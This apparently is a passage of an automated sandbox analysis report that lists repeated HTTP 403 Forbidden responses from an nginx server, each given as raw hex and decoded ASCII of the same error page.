            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:40 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:40 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
